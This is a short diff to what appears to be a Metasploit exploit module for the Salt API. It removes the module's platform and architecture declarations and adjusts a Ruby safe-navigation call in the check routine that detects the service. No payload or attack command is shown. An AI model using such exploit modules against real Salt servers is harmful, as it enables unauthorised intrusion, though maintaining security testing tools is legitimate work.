@@ -55,8 +55,6 @@ class MetasploitModule < Msf::Exploit::Remote
         ],
         'DisclosureDate' => '2021-02-25',
         'License' => MSF_LICENSE,
-        'Platform' => ['unix', 'linux'],
-        'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
         'Privileged' => true,
         'Targets' => [
           [
@@ -134,7 +132,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if res.code == 200 && res.get_json_document['return']
       res_json = res.get_json_document['return'].first
-      if res_json&.key?('tag') && res_json&.key?('jid')
+      if res_json&.key?('tag') && res_json.key?('jid')
         return CheckCode::Detected('Salt API responded as expected.')
       end
     end
